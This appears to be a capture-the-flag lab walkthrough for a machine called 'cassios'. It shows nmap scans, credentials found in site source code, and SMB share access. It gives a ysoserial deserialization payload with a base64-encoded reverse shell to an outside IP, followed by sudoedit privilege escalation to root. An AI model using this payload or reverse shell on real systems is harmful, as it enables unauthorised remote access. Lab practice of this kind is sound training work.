cassios
00 min
2025-3-23
Date
Mar 20, 2025 → Mar 20, 2025
Tag
Nmap
Brute Force
Privilege Escalation Techniques

192.168.247.116

Nmap

└─# nmap -sT -p- --min-rate 5000 $ip Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-20 03:54 EDT Nmap scan report for 192.168.247.116 Host is up (0.071s latency). Not shown: 65530 closed tcp ports (conn-refused) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 139/tcp open netbios-ssn 445/tcp open microsoft-ds 8080/tcp open http-proxy
Nmap done: 1 IP address (1 host up) scanned in 14.30 seconds
└─# nmap -sU -p- --min-rate 5000 $ip Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-20 03:54 EDT Warning: 192.168.247.116 giving up on port because retransmission cap hit (10). Nmap scan report for 192.168.247.116 Host is up (0.061s latency). All 65535 scanned ports on 192.168.247.116 are in ignored states. Not shown: 65387 open|filtered udp ports (no-response), 148 closed udp ports (port-unreach)
Nmap done: 1 IP address (1 host up) scanned in 144.82 seconds

80

notion image
brute force
notion image
notion image
no more information, but we can download two file that include 80 website and 8080 website
and we can find the username and password from 8080 websites source code
notion image

8080

after we login we can see below page
notion image
notion image
we also can find the filename of the data
notion image
but we have nothing to do on port 8080, so we check others port

445,139

notion image
we found that we can access share diver for this host
notion image
notion image
ysoserial
frohoffUpdated Mar 22, 2025
Use this script to replace the .ser file.
java -jar ysoserial-all.jar CommonsCollections4 "bash -c {echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguNDUuMTU4LzQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i}" > recycler.ser
notion image
notion image
after replace .ser file we can got the shell now
notion image
notion image
we can use sudoedit
notion image
notion image
we can edit it if we want
so wee add our account
notion image
notion image
successful root
notion image
 
上一篇
HB
下一篇
AZ-900